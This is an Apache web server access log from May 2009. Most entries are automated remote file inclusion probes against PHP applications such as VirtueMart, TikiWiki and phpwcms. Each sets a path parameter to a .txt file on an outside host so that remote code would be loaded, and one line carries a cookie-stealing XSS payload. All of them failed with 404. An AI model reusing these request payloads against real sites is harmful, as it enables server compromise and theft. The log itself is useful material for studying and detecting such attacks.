81.176.226.180 - - [08/May/2009:02:41:33 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:41:33 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:41:33 -0400] "GET /logs/access_log.Q108090400%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:41:45 -0400] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.typo3sverige.se/typo3temp/cs/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:41:46 -0400] "GET /logs/access_log.Q108090400/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.typo3sverige.se/typo3temp/cs/id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:41:46 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.typo3sverige.se/typo3temp/cs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:41:48 -0400] "GET /logs/access_log.Q109042600//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:41:51 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:41:51 -0400] "GET /logs/access_log.Q108090400%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:41:51 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:42:01 -0400] "GET /logs/access_log.Q108111200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:42:01 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:42:01 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:02:42:02 -0400] "GET /logs/error_log.Q107100500 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.176.226.180 - - [08/May/2009:02:42:03 -0400] "GET /logs/access_log.Q108090900%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:42:21 -0400] "GET /logs/access_log.Q108090900%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/id1v4.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.115.213.66 - - [08/May/2009:02:42:55 -0400] "GET /logs/access_log.Q108092700%20//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
195.20.225.45 - - [08/May/2009:02:43:17 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
61.19.241.61 - - [08/May/2009:02:43:31 -0400] "GET /logs/access_log.Q108092700%20//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:43:32 -0400] "GET /logs/access_log.Q108092700%20//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
86.54.102.45 - - [08/May/2009:02:43:36 -0400] "GET /logs/access_log.Q109041100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:43:36 -0400] "GET /logs/access_log.Q108111200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:43:49 -0400] "GET /logs/access_log.Q109042600//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:44:29 -0400] "GET /logs/access_log.Q109042600//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:02:45:00 -0400] "GET /logs/error_log.Q108011300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [08/May/2009:02:45:01 -0400] "GET /images/items/index4_impltpcsstr.jpg HTTP/1.1" 200 3023 "-" "Googlebot-Image/1.0"
122.70.59.13 - - [08/May/2009:02:46:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
122.70.59.13 - - [08/May/2009:02:46:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
122.70.59.13 - - [08/May/2009:02:46:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
122.70.59.13 - - [08/May/2009:02:46:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
121.254.231.239 - - [08/May/2009:02:49:25 -0400] "GET /logs/access_log.Q108090900/show_news.php?cutepath=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
202.53.250.22 - - [08/May/2009:02:49:35 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
202.53.250.22 - - [08/May/2009:02:49:42 -0400] "GET /convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
58.227.193.198 - - [08/May/2009:02:49:46 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:49:46 -0400] "GET //e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:49:46 -0400] "GET /logs/access_log.Q108103100//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:49:58 -0400] "GET /logs/access_log.Q109010300//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:50:05 -0400] "GET /logs/access_log.Q108112400/show_news.php?cutepath=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
194.151.169.3 - - [08/May/2009:02:50:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
194.151.169.3 - - [08/May/2009:02:50:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
194.151.169.3 - - [08/May/2009:02:50:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
194.151.169.3 - - [08/May/2009:02:50:49 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.0.54.98 - - [08/May/2009:02:50:57 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:50:57 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:51:00 -0400] "GET /logs/access_log.Q108111200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:02:51:07 -0400] "GET /logs/access_log.Q108082100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:02:51:07 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:02:51:11 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.93.90.162 - - [08/May/2009:02:51:44 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:02:51:44 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:02:51:44 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
62.140.23.192 - - [08/May/2009:02:52:01 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:01 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:01 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:10 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:16 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:16 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:16 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:52:25 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:52:28 -0400] "GET /logs/access_log.Q108090400%20%20/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.typo3sverige.se/typo3temp/cs/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:02:53:10 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:02:53:33 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:02:53:33 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:02:53:34 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
66.249.72.114 - - [08/May/2009:02:54:18 -0400] "GET /logs/access_log.Q108070100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.140.23.192 - - [08/May/2009:02:54:19 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:54:19 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:54:20 -0400] "GET /logs/access_log.Q108081900%20%20//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:54:29 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:54:29 -0400] "GET /logs/access_log.Q108081900%20%20//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:54:30 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.214.72.235 - - [08/May/2009:02:54:46 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
85.214.72.235 - - [08/May/2009:02:54:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
195.20.225.45 - - [08/May/2009:02:54:46 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
85.214.72.235 - - [08/May/2009:02:54:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
62.140.23.192 - - [08/May/2009:02:55:01 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:02 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:02 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:02:55:03 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:02:55:03 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:02:55:03 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:03 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:03 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:02:55:07 -0400] "GET /logs/access_log.Q108100400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:55:11 -0400] "GET /logs/access_log.Q108103100%20%20//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:02:55:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [08/May/2009:02:55:14 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:14 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:14 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:18 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:20 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:20 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:20 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:22 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:55:24 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:55:24 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:55:24 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:24 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:27 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:55:29 -0400] "GET /logs/access_log.Q108100400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:30 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:30 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:31 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:02:55:32 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:02:55:33 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:02:55:33 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
62.140.23.192 - - [08/May/2009:02:55:34 -0400] "GET /logs/access_log.Q108090700%20%20//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:38 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:02:55:40 -0400] "GET /logs/error_log.Q109010300%20%20//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:42 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:43 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:43 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:44 -0400] "GET /logs/access_log.Q108090700%20%20//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:02:55:50 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:02:56:07 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:02:56:07 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:02:56:07 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
202.53.250.22 - - [08/May/2009:02:56:42 -0400] "GET /logs/access_log.Q108083100//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.74.61.78 - - [08/May/2009:02:56:43 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.808"
